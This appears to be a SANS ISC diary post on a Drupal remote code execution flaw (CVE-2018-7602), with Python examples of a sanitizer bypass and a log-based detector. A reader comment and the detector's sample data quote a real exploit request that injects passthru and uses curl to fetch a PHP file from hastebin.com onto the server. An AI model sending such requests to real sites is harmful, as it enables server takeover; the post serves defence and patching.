
SANS ISC: Yet Another Drupal RCE Vulnerability - SANS Internet Storm Center


Yet Another Drupal RCE Vulnerability

Drupal today released another patch addressing a remote code execution vulnerability (SA-CORE-2018-004 [1], CVE-2018-7602). According to the advisory, the vulnerability is related to the issue patched about a month ago (SA-CORE-2018-002), but at the time of writing this variant has not been exploited yet. The fixed releases are Drupal 7.59, 8.5.3 and 8.4.8. Please patch ASAP!

An exploit for the vulnerability has been posted to pastebin [2]. This exploit does require authentication, so an attacker needs an account on the target site. That lowers the exposure compared to the unauthenticated March bug, but it is no reason to defer the patch.

With the March update, Drupal added a global sanitization function that runs over incoming request data (query string, POST body, cookies) and strips keys beginning with '#', the render-array properties such as #post_render and #markup that the exploits inject. This approach is often difficult to implement correctly. It is very hard to sanitize and validate data before it is clear how it will be used, and even harder to retrofit onto an existing and complex application like Drupal: anything the application decodes, unserializes or re-parses after the sanitizer has run produces data the sanitizer never saw. We will see how this works out for Drupal in the long run.
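The weakness of a front-door sanitizer, as an added Python example that is not Drupal's code: a sanitizer strips every '#'-prefixed key from the parsed request, and a later consumer re-parses a URL carried inside a `destination` parameter, at which point the stripped keys reappear. The `destination` parameter name, the simplified PHP-style nested-key parser and the sample request are assumptions for illustration, not the exact bypass from the advisory; the '#' keys themselves are the ones seen in exploit requests (#post_render, #markup).

```python
import re
from urllib.parse import unquote_plus


def php_parse_query(qs):
    """Parse a query string the way PHP fills $_GET: 'a[b][]=v' nests into dicts.
    Simplified: assumes well-formed bracket keys, which is enough for this illustration."""
    result = {}
    for pair in qs.split("&"):
        if not pair:
            continue
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote_plus(raw_key), unquote_plus(raw_val)
        m = re.match(r"([^\[]*)((?:\[[^\]]*\])*)", key)
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = result
        for depth, part in enumerate(path):
            if part == "":                      # 'x[]' appends with the next index
                part = str(len(node))
            if depth == len(path) - 1:
                node[part] = val
            else:
                node = node.setdefault(part, {})
    return result


def strip_hash_keys(data):
    """Recursively drop every key that starts with '#': render-array properties
    such as '#post_render' or '#markup' must never arrive from the client."""
    if isinstance(data, dict):
        return {k: strip_hash_keys(v) for k, v in data.items() if not k.startswith("#")}
    return data


def contains_hash_key(data):
    """True if any key at any depth starts with '#'."""
    if isinstance(data, dict):
        return any(k.startswith("#") or contains_hash_key(v) for k, v in data.items())
    return False


def front_door_sanitize(query_string):
    """The 'sanitize once at the front door' approach: parse, strip, hand on."""
    return strip_hash_keys(php_parse_query(query_string))


def resolve_destination_unsafe(request):
    """A later consumer that re-parses a URL carried in 'destination' (assumed parameter
    name, for illustration). The front-door sanitizer never saw this second parse."""
    dest = request.get("destination", "")
    return php_parse_query(dest.partition("?")[2])


def resolve_destination_safe(request):
    """Same consumer, but the invariant is re-applied at the point of use: every time
    untrusted data is parsed again, the '#' keys are stripped again."""
    return strip_hash_keys(resolve_destination_unsafe(request))


# Constructed sample request: the dangerous keys are hidden inside a URL-encoded value,
# so after one decode they are data, and only the second parse turns them into keys.
CONSTRUCTED_QUERY = (
    "q=user/password"
    "&destination=/user?name%5B%23post_render%5D%5B%5D%3Dpassthru%26name%5B%23markup%5D%3Did"
)

if __name__ == "__main__":
    req = front_door_sanitize(CONSTRUCTED_QUERY)
    print("after front-door sanitizer:", contains_hash_key(req))
    print("after re-parsing destination, unsafe:", contains_hash_key(resolve_destination_unsafe(req)))
    print("after re-parsing destination, safe:", contains_hash_key(resolve_destination_safe(req)))
```

The direct form of the attack (`name[%23markup]=...` in the outer query) is caught by `front_door_sanitize`; the nested form passes it untouched because at that point the payload is a string value, not a key. The only robust fix is to enforce the invariant where the data is consumed, or after every parse, rather than once at the edge.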

[1] https://www.drupal.org/sa-core-2018-004
[2] https://pastebin.com/pRM8nmwj (leads to exploit code)

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

Johannes (ISC Handler, 3372 posts):
Not sure if this is a replacement for pastebin?

It works just fine on a Drupal 7.59 site.

/logs/access_log:89.40.123.197 - - [20/Jun/2018:10:49:49 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/installer.php+'https://hastebin.com/raw/ekacocutup.php' HTTP/1.0" 200 14857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
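Detection logic for the request pattern in the log line above, as an added Python example that is not part of the ISC post: it parses combined-format access log lines and flags any request whose query string uses a '#'-prefixed render-array property as an array key (`name[%23post_render]` and friends), after one and two rounds of URL decoding. The first sample line is the one quoted in the comment (grep file prefix removed); the benign line and the double-encoded line are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache/nginx "combined" format. The target group accepts anything without
# whitespace so that long injected payloads are captured intact.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A render-array property smuggled in as a form/query array key: name[#post_render] etc.
PROPERTY_RE = re.compile(r"\[(#[A-Za-z_]+)\]")


def parse_line(line):
    """Split a combined-format log line into fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def render_properties_in(target):
    """Return every '#'-prefixed render-array property used as a key in the request
    target's query string. parse_qsl decodes %23 once; unquote catches a %2523 layer."""
    query = target.partition("?")[2]
    found = set()
    for key, _ in parse_qsl(query, keep_blank_values=True):
        for candidate in (key, unquote(key)):
            found.update(PROPERTY_RE.findall(candidate))
    return sorted(found)


def detect(line):
    """Classify one log line: None if unparseable, else a record whose 'suspicious'
    flag is True when any '#' property rode in as an array key."""
    rec = parse_line(line)
    if rec is None:
        return None
    props = render_properties_in(rec["target"])
    return {
        "ip": rec["ip"],
        "ts": rec["ts"],
        "method": rec["method"],
        "status": rec["status"],
        "properties": props,
        "suspicious": bool(props),
    }


def scan(lines):
    """Return the suspicious records from an iterable of log lines."""
    return [rec for rec in map(detect, lines) if rec and rec["suspicious"]]


SAMPLE_LINES = [
    # The request quoted in the comment above (grep file prefix removed).
    '89.40.123.197 - - [20/Jun/2018:10:49:49 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/files/.htaccess+htaccessx;curl+-o+sites/default/files/installer.php+\'https://hastebin.com/raw/ekacocutup.php\' HTTP/1.0" 200 14857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"',
    # Constructed benign password-reset request for comparison.
    '203.0.113.5 - - [20/Jun/2018:10:50:01 -0400] "GET /?q=user/password&name=alice HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Constructed double-encoded variant (%2523 -> %23 -> #) that a single decode would miss.
    '198.51.100.7 - - [20/Jun/2018:10:50:30 -0400] "POST /?q=user/password&name[%2523markup]=x HTTP/1.1" 403 512 "-" "curl/7.58.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit["ts"], hit["ip"], hit["method"], hit["status"], ",".join(hit["properties"]))
```

The match is on the key shape rather than on a specific property name or payload string, because the property (#post_render, #lazy_builder, #markup) and the command after it vary between exploit kits while the underlying trick, a client-supplied '#' key, does not. A 200 response to such a request, as in the quoted line, is the signal to treat the host as compromised rather than merely scanned.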